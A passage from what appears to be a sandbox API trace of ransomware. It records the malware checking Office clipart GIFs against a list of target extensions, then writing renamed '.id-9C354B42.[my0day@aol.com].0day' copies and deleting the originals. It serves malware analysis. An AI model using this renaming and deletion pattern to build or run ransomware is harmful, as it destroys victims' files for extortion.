Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0052.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0052.192] lstrlenW (lpString=".doc") returned 4 [0052.192] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.192] lstrlenW (lpString=".docx") returned 5 [0052.192] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.192] lstrlenW (lpString=".pdf") returned 4 [0052.192] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.192] lstrlenW (lpString=".xls") returned 4 [0052.192] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.192] lstrlenW (lpString=".xlsx") returned 5 [0052.192] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.192] lstrlenW (lpString=".ppt") returned 4 [0052.192] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0052.192] lstrlenW (lpString=".zip") returned 4 [0052.192] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.192] lstrlenW (lpString=".rar") returned 4 [0052.192] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.192] lstrlenW (lpString=".bz2") returned 4 [0052.192] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.192] lstrlenW (lpString=".7z") returned 3 [0052.192] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0052.192] lstrlenW (lpString=".dbf") returned 4 [0052.192] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0052.192] lstrlenW (lpString=".1cd") returned 4 [0052.192] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0052.192] lstrlenW (lpString=".jpg") returned 4 [0052.192] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.193] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=517) returned 1 [0052.193] CloseHandle (hObject=0x228) returned 1 [0052.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 0x20 [0052.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.193] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.193] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.201] GetLastError () returned 0x0 [0052.201] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x205, lpOverlapped=0x0) returned 1 [0052.202] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x210, lpOverlapped=0x0) returned 1 [0052.203] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.203] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.203] SetEndOfFile (hFile=0x1a0) returned 1 [0052.203] CloseHandle (hObject=0x1a0) returned 1 [0052.203] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.204] SetEndOfFile (hFile=0x228) returned 1 [0052.204] CloseHandle (hObject=0x228) returned 1 [0052.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.204] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0052.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0052.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0052.205] lstrlenW (lpString=".doc") returned 4 [0052.205] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.205] lstrlenW (lpString=".docx") returned 5 [0052.205] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.205] lstrlenW (lpString=".pdf") returned 4 [0052.205] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.205] lstrlenW (lpString=".xls") returned 4 [0052.205] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.205] lstrlenW (lpString=".xlsx") returned 5 [0052.205] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.205] lstrlenW (lpString=".ppt") returned 4 [0052.205] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0052.205] lstrlenW (lpString=".zip") returned 4 [0052.205] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.205] lstrlenW (lpString=".rar") returned 4 [0052.205] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.205] lstrlenW (lpString=".bz2") returned 4 [0052.205] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.205] lstrlenW (lpString=".7z") returned 3 [0052.205] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0052.205] lstrlenW (lpString=".dbf") returned 4 [0052.205] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0052.205] lstrlenW (lpString=".1cd") returned 4 [0052.205] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0052.205] lstrlenW (lpString=".jpg") returned 4 [0052.205] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.206] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=502) returned 1 [0052.206] CloseHandle (hObject=0x228) returned 1 [0052.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 0x20 [0052.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.206] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.206] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.206] GetLastError () returned 0x0 [0052.206] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1f6, lpOverlapped=0x0) returned 1 [0052.207] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x200, lpOverlapped=0x0) returned 1 [0052.208] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.208] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.208] SetEndOfFile (hFile=0x1a0) returned 1 [0052.208] CloseHandle (hObject=0x1a0) returned 1 [0052.209] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.209] SetEndOfFile (hFile=0x228) returned 1 [0052.209] CloseHandle (hObject=0x228) returned 1 [0052.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0052.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0052.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0052.210] lstrlenW (lpString=".doc") returned 4 [0052.210] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.210] lstrlenW (lpString=".docx") returned 5 [0052.210] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.210] lstrlenW (lpString=".pdf") returned 4 [0052.210] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.210] lstrlenW (lpString=".xls") returned 4 [0052.210] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.210] lstrlenW (lpString=".xlsx") returned 5 [0052.210] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.210] lstrlenW (lpString=".ppt") returned 4 [0052.210] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0052.210] lstrlenW (lpString=".zip") returned 4 [0052.210] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.210] lstrlenW (lpString=".rar") returned 4 [0052.210] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.210] lstrlenW (lpString=".bz2") returned 4 [0052.210] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.210] lstrlenW (lpString=".7z") returned 3 [0052.210] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0052.210] lstrlenW (lpString=".dbf") returned 4 [0052.210] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0052.210] lstrlenW (lpString=".1cd") returned 4 [0052.210] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0052.210] lstrlenW (lpString=".jpg") returned 4 [0052.210] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.211] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=12702) returned 1 [0052.211] CloseHandle (hObject=0x228) returned 1 [0052.212] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 0x20 [0052.212] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.212] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.212] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.212] GetLastError () returned 0x0 [0052.212] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x319e, lpOverlapped=0x0) returned 1 [0052.214] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x31a0, lpOverlapped=0x0) returned 1 [0052.215] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.215] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.215] SetEndOfFile (hFile=0x1a0) returned 1 [0052.215] CloseHandle (hObject=0x1a0) returned 1 [0052.215] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.215] SetEndOfFile (hFile=0x228) returned 1 [0052.216] CloseHandle (hObject=0x228) returned 1 [0052.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.216] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0052.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0052.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0052.217] lstrlenW (lpString=".doc") returned 4 [0052.217] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.217] lstrlenW (lpString=".docx") returned 5 [0052.217] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.217] lstrlenW (lpString=".pdf") returned 4 [0052.217] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.217] lstrlenW (lpString=".xls") returned 4 [0052.217] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.217] lstrlenW (lpString=".xlsx") returned 5 [0052.217] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.217] lstrlenW (lpString=".ppt") returned 4 [0052.217] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0052.217] lstrlenW (lpString=".zip") returned 4 [0052.217] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.217] lstrlenW (lpString=".rar") returned 4 [0052.217] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.217] lstrlenW (lpString=".bz2") returned 4 [0052.217] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.217] lstrlenW (lpString=".7z") returned 3 [0052.217] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0052.217] lstrlenW (lpString=".dbf") returned 4 [0052.217] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0052.217] lstrlenW (lpString=".1cd") returned 4 [0052.217] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0052.217] lstrlenW (lpString=".jpg") returned 4 [0052.217] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.218] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=3484) returned 1 [0052.218] CloseHandle (hObject=0x228) returned 1 [0052.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 0x20 [0052.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.218] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.218] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.218] GetLastError () returned 0x0 [0052.218] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xd9c, lpOverlapped=0x0) returned 1 [0052.220] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xda0, lpOverlapped=0x0) returned 1 [0052.221] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.221] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.221] SetEndOfFile (hFile=0x1a0) returned 1 [0052.221] CloseHandle (hObject=0x1a0) returned 1 [0052.221] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.221] SetEndOfFile (hFile=0x228) returned 1 [0052.222] CloseHandle (hObject=0x228) returned 1 [0052.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0052.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0052.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0052.222] lstrlenW (lpString=".doc") returned 4 [0052.222] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.222] lstrlenW (lpString=".docx") returned 5 [0052.222] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.222] lstrlenW (lpString=".pdf") returned 4 [0052.222] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.222] lstrlenW (lpString=".xls") returned 4 [0052.222] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.223] lstrlenW (lpString=".xlsx") returned 5 [0052.223] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.223] lstrlenW (lpString=".ppt") returned 4 [0052.223] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0052.223] lstrlenW (lpString=".zip") returned 4 [0052.223] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.223] lstrlenW (lpString=".rar") returned 4 [0052.223] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.223] lstrlenW (lpString=".bz2") returned 4 [0052.223] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.223] lstrlenW (lpString=".7z") returned 3 [0052.223] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0052.223] lstrlenW (lpString=".dbf") returned 4 [0052.223] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0052.223] lstrlenW (lpString=".1cd") returned 4 [0052.223] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0052.223] lstrlenW (lpString=".jpg") returned 4 [0052.223] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.223] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=3140) returned 1 [0052.223] CloseHandle (hObject=0x228) returned 1 [0052.224] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 0x20 [0052.224] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.224] SetFilePointerEx (in: 